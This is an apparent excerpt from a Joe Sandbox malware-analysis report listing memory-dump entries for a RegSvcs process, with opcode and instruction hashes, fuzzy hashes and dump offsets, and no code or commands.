                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 37b72a051a92204a85b0daf8f9642669100da04c8f823fc45d547ff72e059c8a
                                                • Instruction ID: 0c41dce526c12c85ddf9df235da49bab8e908841805828a54ca9d69220eecaf4
                                                • Opcode Fuzzy Hash: 37b72a051a92204a85b0daf8f9642669100da04c8f823fc45d547ff72e059c8a
                                                • Instruction Fuzzy Hash: 38512C321123418FDB0AEF68F884A4A3B79FB5674470491FDD0416B226EB7D6D49CF82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0c0e4aebd2afa9e176983f4351d51bd0106c2ea00dd5ca5775092be4c0b09a90
                                                • Instruction ID: 7754e0ba4e5b6b8aec250929440d03f2d1574eaaa4ef7656cb7f2a2146e8a0fd
                                                • Opcode Fuzzy Hash: 0c0e4aebd2afa9e176983f4351d51bd0106c2ea00dd5ca5775092be4c0b09a90
                                                • Instruction Fuzzy Hash: F551F375E002188FEB18DFA9C885B9EBBB1BF48314F14851AE815BB391DB74A844CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7e167aa0808fafc19ba7338412e954c8dab09ca6496de55bc947bb3c4dac084d
                                                • Instruction ID: 48e14c73a7f9e7200372d4891d167d705b424ff00103871d8b25498a1e1f0fc0
                                                • Opcode Fuzzy Hash: 7e167aa0808fafc19ba7338412e954c8dab09ca6496de55bc947bb3c4dac084d
                                                • Instruction Fuzzy Hash: E951D9322123458FDB0AEF68F884A5A3B7AFB5574430191FDD0416B226EB7D6D49CF82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a00973120bc3f28cbe997fd8350a46e203a04a3d9bd7d7cca071246c92af6a78
                                                • Instruction ID: 171f441aaaabb6542e12f620c24e2b0577626740f442034fdebcc4719698e23c
                                                • Opcode Fuzzy Hash: a00973120bc3f28cbe997fd8350a46e203a04a3d9bd7d7cca071246c92af6a78
                                                • Instruction Fuzzy Hash: F9315934A10245CFDB14EF69D55879EBBF1FF88204F2044A9E50AEB3A0DB7A9C45CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 34cbae952a122f276a4140e976b2502e1e0a50dd27982caf47373f328e625210
                                                • Instruction ID: c50d06b8da446bae84f2b02cf79a5d802436d2fcbf189c2a034ae6de77c35fc4
                                                • Opcode Fuzzy Hash: 34cbae952a122f276a4140e976b2502e1e0a50dd27982caf47373f328e625210
                                                • Instruction Fuzzy Hash: 01318031E006159BDB15DFA8D85469EB7B6FF89300F10892AE806FB761DB75EC82CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68f95cd5156eb30d3d0ef0a62319c228e9c36ceed55df1414944257e39054eb2
                                                • Instruction ID: 91738cf210a11b556a909098e97c6a9d42790f6f1280da6252d70e7e9b8425f3
                                                • Opcode Fuzzy Hash: 68f95cd5156eb30d3d0ef0a62319c228e9c36ceed55df1414944257e39054eb2
                                                • Instruction Fuzzy Hash: B141FDB0D003489FEB20DFA9C484A9EBFF5BF48314F14852AE419AB250DB759946CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3af0895053af8884e7d82b2a4d1e6d23c139715f87325a01df7becd2e73a0ffb
                                                • Instruction ID: 530a3d42a92c2711dbbe658088ad526724b65ec5de7eab6e6c4e4189c1f1845a
                                                • Opcode Fuzzy Hash: 3af0895053af8884e7d82b2a4d1e6d23c139715f87325a01df7becd2e73a0ffb
                                                • Instruction Fuzzy Hash: 01314E31E006159BDB15DFA8D454A9EB7B6FF89300F10852AE806FB761DB75AC82CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b80d35eb5d872656fc7a144378f7a2a6c4d27425fe62935ba5c1f81b9f87a924
                                                • Instruction ID: 0dc8edf1a719cdf67b8c2094ed245e127be69ef545fb30cc37333fda6cb4ca80
                                                • Opcode Fuzzy Hash: b80d35eb5d872656fc7a144378f7a2a6c4d27425fe62935ba5c1f81b9f87a924
                                                • Instruction Fuzzy Hash: 8A41CFB0D003489FDB14DF99C484A9EBFF5FF48314F14842AE819AB254DB75A946CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b7e6e3707b8355c67cdd6b7ce72ad57649e2715ae68b0455519ae36a183ee08
                                                • Instruction ID: c8ae3489818a59f7d839f3f9b9ae5030d377a5576649942501e44ac5ba717ac4
                                                • Opcode Fuzzy Hash: 0b7e6e3707b8355c67cdd6b7ce72ad57649e2715ae68b0455519ae36a183ee08
                                                • Instruction Fuzzy Hash: C031C531E102099BDB15DFA8D8407AEF7B6FFC9304F108519E806FB251EB709841CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ed160136144908be6b0515c15ba82fd486c89f1ec01ed8b88a0b09defda7191
                                                • Instruction ID: 24e9eb34aff57b8043d70a5b2c7eff11470d4609a6e38cf33a07fc7e8fc95974
                                                • Opcode Fuzzy Hash: 3ed160136144908be6b0515c15ba82fd486c89f1ec01ed8b88a0b09defda7191
                                                • Instruction Fuzzy Hash: 91219431E102099BDB15DFA8D8506AEF7B6FFC9304F10C619E806FB251DB709845CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e9b82fd30eda704d1a8d05a5eb0f02ed6c0ffb43a50ca88bafc840e6e8b10f12
                                                • Instruction ID: 12eb298c6c2ee269e9c4089d408e79ede4d12593ca5d95abdff5acae009b1364
                                                • Opcode Fuzzy Hash: e9b82fd30eda704d1a8d05a5eb0f02ed6c0ffb43a50ca88bafc840e6e8b10f12
                                                • Instruction Fuzzy Hash: 2E21A1302106049FEB26BE28E884B5E376DFB45344F109A38E446EB256EB7DDC428B81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4d113c8bb20e8f822fac7082563435bf8bfcfbdd7d046eabdb9239e99b72547
                                                • Instruction ID: 85bdcf10f1de39309ed813732f7dab4a633ecec3f252ffb5039a9043d46331e0
                                                • Opcode Fuzzy Hash: a4d113c8bb20e8f822fac7082563435bf8bfcfbdd7d046eabdb9239e99b72547
                                                • Instruction Fuzzy Hash: 3921B534E046059FDB19DFA9D8546EEF7B2BFC5304F10861AE816BB381DB709945CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394625491.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_153d000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 454def64be3689f7e611edcfcc21ca06e6fd0bf33bec74d862ce5c4f805a191d
                                                • Instruction ID: c7340906aa4189dc18eeec3cf8c11a86f5c63f3abae0f797927d93a9a73c006f
                                                • Opcode Fuzzy Hash: 454def64be3689f7e611edcfcc21ca06e6fd0bf33bec74d862ce5c4f805a191d
                                                • Instruction Fuzzy Hash: 6621FF716042049FDB15DFA4D880B2AFBB5FBC8654F60C969E84A0F252D33AD847CA62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f97bd75d660bd39ae3693cbf1c3dcb4fd817488c14ec4fdb325a59945abf7353
                                                • Instruction ID: ae978ff8a7ae24f090361f0d6a129b90ceb9c7f98249d19791d3e52d44a3fd98
                                                • Opcode Fuzzy Hash: f97bd75d660bd39ae3693cbf1c3dcb4fd817488c14ec4fdb325a59945abf7353
                                                • Instruction Fuzzy Hash: A9218034E0420A9BCB19DFA9D8545EEF7B2BFC9304F20861AE816BB340DB70A945CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 43a785bc979c9135cd4fe0b2d894aed6a39797de8a7dc882ec78ffdee4cb7e72
                                                • Instruction ID: ab3e7563e7c36f85c567b294137aba1cf1c4f711ed6121224532f69e0e4671a0
                                                • Opcode Fuzzy Hash: 43a785bc979c9135cd4fe0b2d894aed6a39797de8a7dc882ec78ffdee4cb7e72
                                                • Instruction Fuzzy Hash: 4921E730B00605CFDB14FB68C5946AE77F6BB89245F1004A8D506FF291EB3A9D46CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ab2a9b80a1d73911a6ef2a15d62fc1609e4a878105fb12238b4d6aa26878df40
                                                • Instruction ID: 43238b1ab7a91a83c504563e954f5871281ca50284f9604238b3628b3fe92f20
                                                • Opcode Fuzzy Hash: ab2a9b80a1d73911a6ef2a15d62fc1609e4a878105fb12238b4d6aa26878df40
                                                • Instruction Fuzzy Hash: 0B21CA306007018FEB366E6CE4C972D3B69F746711F14082AE406EF2A2DE3D88868742
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0163dcec5605c6f4c499f6bf7ddcb9100c956309704c1c1288414e8637854f54
                                                • Instruction ID: cc19d191534f74ea91ffa8be66868620130a8161dee776b5b7fd507f14a22f71
                                                • Opcode Fuzzy Hash: 0163dcec5605c6f4c499f6bf7ddcb9100c956309704c1c1288414e8637854f54
                                                • Instruction Fuzzy Hash: DD2142306106048FEF16FE68E884B5E376DFB45344F105A39E446DB256EB7CDC418B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4cd591736318e796a4e426e65506708ea96f950222d6262fde5cd2c032185d04
                                                • Instruction ID: 57c704da43417c5cbafe5b1ee2b5846b7367ef91610ba41e560716742bcd0491
                                                • Opcode Fuzzy Hash: 4cd591736318e796a4e426e65506708ea96f950222d6262fde5cd2c032185d04
                                                • Instruction Fuzzy Hash: 5A210A30B40645CFDB14FB78C9946AE77B6BB89205F1005A9D105FF2A1DB3A8D42CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1ecaaa4b9d43f928985f203dbfc9ddd59a5069eb98b8fef4883ecc3d9d30312d
                                                • Instruction ID: 02b24dd4d819b9c447294411e69b9b3585f69fc03976d0e497b246b4caa18f6f
                                                • Opcode Fuzzy Hash: 1ecaaa4b9d43f928985f203dbfc9ddd59a5069eb98b8fef4883ecc3d9d30312d
                                                • Instruction Fuzzy Hash: DF21F434710205CFDB14EF79D558AAE77F5FB89204B2004A8E506EF3A4EB7A9D05CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7b9cac18e9d7d375f1fcc1d7b7e6971713ed07b928121e25f726f07e6ee15eab
                                                • Instruction ID: 674c8eb8d63bb5a9148be3f31fe528d62ec560992cd050f224f2e4791aeb99cf
                                                • Opcode Fuzzy Hash: 7b9cac18e9d7d375f1fcc1d7b7e6971713ed07b928121e25f726f07e6ee15eab
                                                • Instruction Fuzzy Hash: 041179706007158FEB367E6CE4C972D3A69F746754F140829E407EF6A1DE7988868742
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bb71a6283eb3fe1595ece9246f3420eb94f835e88f33c4b5f9452ca7f648f174
                                                • Instruction ID: 0df23b99794015d6b8298aaf49f5ced8c4b787e85591c98d5086e65026c62daf
                                                • Opcode Fuzzy Hash: bb71a6283eb3fe1595ece9246f3420eb94f835e88f33c4b5f9452ca7f648f174
                                                • Instruction Fuzzy Hash: E1116631A153044BEF167A68841476E3655FB81254F144979F442FF1C2D668CCC94FD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9a93050e6faab8e21b11b9d6adeebb338ae69ad8a49156da27e213c365b8a2bc
                                                • Instruction ID: 05f7bc5a0c6415ff38771d2c0eee4f74c702e991d8fb572d8f486d66f7880c35
                                                • Opcode Fuzzy Hash: 9a93050e6faab8e21b11b9d6adeebb338ae69ad8a49156da27e213c365b8a2bc
                                                • Instruction Fuzzy Hash: 7E118230B212048BEF667A79C40472E3295FB85654F104939F406EF2C2EA78DDCA8FC1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394625491.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_153d000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b23b223794c594d5e6912f78f9472eadffb5c7d9f8bb7b7a1d8fe28e6ec3547
                                                • Instruction ID: 2163cb37adcb59336ed5f26f26511be5e78c9cda1e54eef5f4f5529f93f9af3c
                                                • Opcode Fuzzy Hash: 5b23b223794c594d5e6912f78f9472eadffb5c7d9f8bb7b7a1d8fe28e6ec3547
                                                • Instruction Fuzzy Hash: 302180755093808FCB02CF64D990715FF71FB86214F28C5DAD8498F2A7C33A980ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2de9322f2925e5dacdfc1a782eab0e6c5dd8bb88e33231b3de44f468ee21e9cf
                                                • Instruction ID: 82c2746098e75d7de3de840453b4a661982980e0ec0be35c07bbbaecf45a752b
                                                • Opcode Fuzzy Hash: 2de9322f2925e5dacdfc1a782eab0e6c5dd8bb88e33231b3de44f468ee21e9cf
                                                • Instruction Fuzzy Hash: CF01042155D252C7FF23B56880A4238BB0C7B31264B64482AF2D4BB78BD724C15CD662
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ff8615cb592c5e38645b361f43f170b3f746c2dedc52be40253eba47666dc4b4
                                                • Instruction ID: 039b3754319ed7f121dca0f6dc781926439bc668240caf66a28db52178a7cdd6
                                                • Opcode Fuzzy Hash: ff8615cb592c5e38645b361f43f170b3f746c2dedc52be40253eba47666dc4b4
                                                • Instruction Fuzzy Hash: 7E11C2327082516FD305AB38845465E7FB6FFCA700B1185EAD049CB392EA398846CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b6075b5531238426e4932d804a2472b76f567d4849cfb32b10a72666975b15db
                                                • Instruction ID: 42a9d7f64b8f8f2f54333d422f8cd6f579d46f3d2eee4a432ae9966374420044
                                                • Opcode Fuzzy Hash: b6075b5531238426e4932d804a2472b76f567d4849cfb32b10a72666975b15db
                                                • Instruction Fuzzy Hash: 6611C276B407018FDB10AE78A98965E7BA9FB84764F14046DE505EB284EB3899038B81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f54c8bf7c9755ccc456a4cfe0999d3efafa65daf462a26e0ed0b293cd77c564
                                                • Instruction ID: 0899f16e31d41aed39427672ac5537f757f46277b85c06e2c60d025c61ce440e
                                                • Opcode Fuzzy Hash: 2f54c8bf7c9755ccc456a4cfe0999d3efafa65daf462a26e0ed0b293cd77c564
                                                • Instruction Fuzzy Hash: E5111E31A006159FDB11FFBC84901AE7BF5FB88210F154479D805FB341E736D9428BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b61461ca8bc802acd53a6bbcee823736416749ecc03318a5e5eab7ecbce5e5db
                                                • Instruction ID: 4eff0a21b1abf5548db1d44831707e2bb916b8ed3fc0c178b5438b0ff53b81c2
                                                • Opcode Fuzzy Hash: b61461ca8bc802acd53a6bbcee823736416749ecc03318a5e5eab7ecbce5e5db
                                                • Instruction Fuzzy Hash: DE018BB5B002159FCB10AEB9A84965F7FA9FB88660F100479E905E3344EA3899028B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 39685a7f5920f111f8b0654e1c529d0e8c61632f90720622c3ab65c312c904b8
                                                • Instruction ID: 3d6b2c110c753664d26b23d386ab83e76660392e96ba97191e4f913319db9131
                                                • Opcode Fuzzy Hash: 39685a7f5920f111f8b0654e1c529d0e8c61632f90720622c3ab65c312c904b8
                                                • Instruction Fuzzy Hash: 6D012D31A006169FDF22FFBC84901AE7BE5FB88220B15447AD805FB341E736C9428BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dc2013d2b1b4a38b8332b9237df0e4f34008c3655f28e2f12c2d737cb7f4a125
                                                • Instruction ID: 10081c100d24e54983c404f5bb95c5b8012b59d2baf26453e81b29c5b0d21814
                                                • Opcode Fuzzy Hash: dc2013d2b1b4a38b8332b9237df0e4f34008c3655f28e2f12c2d737cb7f4a125
                                                • Instruction Fuzzy Hash: 3701DF72B042559FD705ABB8945035D7BA6FFCA301F0044AEC00ADB391EE7988458BA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 325c125852eb6d3b2ea000ff87b0ff4f8a323be3c4ebeacea86e46d856067fa0
                                                • Instruction ID: 55d2728f36a6075b3ce1bac29df7b13e31a4ec34ef3e8d5825be7d1b2465136a
                                                • Opcode Fuzzy Hash: 325c125852eb6d3b2ea000ff87b0ff4f8a323be3c4ebeacea86e46d856067fa0
                                                • Instruction Fuzzy Hash: 1D11F330E0024ADFEF24FA98D9987ECBB72BF70319F14112AD811BA1909B7048C9CB15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 79de61384ebc5586476b40c805b42ba4a264ade4b6a124670b4b6a96b1807187
                                                • Instruction ID: 3a91171290df9ca497788e0d6bc22150cf6f45e48086edf96991e01dabb83e64
                                                • Opcode Fuzzy Hash: 79de61384ebc5586476b40c805b42ba4a264ade4b6a124670b4b6a96b1807187
                                                • Instruction Fuzzy Hash: 08F04F20A2920996FF32756D885033C3658F751214F104835F689EF2C6DB28C999DB96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1c6b1cf06cb993084672dd79f05b4bf113a3f62bbcddacfcd381e7df6fc15462
                                                • Instruction ID: 4cd8eb9d2d94040ee3da7d1484a932fd09657974702f927bc70644b553673fea
                                                • Opcode Fuzzy Hash: 1c6b1cf06cb993084672dd79f05b4bf113a3f62bbcddacfcd381e7df6fc15462
                                                • Instruction Fuzzy Hash: 7F011A30910209AFEB45EFA4E850A9E7BBAFB44340F1056B9C845AB150EA79AE449B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cfcf13bbe89ee71075da0b38650470cef3d955c34a47bec8bd3772242efcafa9
                                                • Instruction ID: 6b2bb1a70f11b3570a540c9cd9eb4cf105e66c41b19192edee83da48d919e220
                                                • Opcode Fuzzy Hash: cfcf13bbe89ee71075da0b38650470cef3d955c34a47bec8bd3772242efcafa9
                                                • Instruction Fuzzy Hash: 6EF02E1161E14147FF23716854A02787B58BF23274B90446AE1C8FF7D7E604C45DC751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0a4eda22b59a86ffc8d567b38e6ac02fb2e92a828828938ec640df52437635bf
                                                • Instruction ID: 288fb3db31a40f50f927b5c0ffaf6238e15fbfd9f652fe008cba6e3c8a2ef787
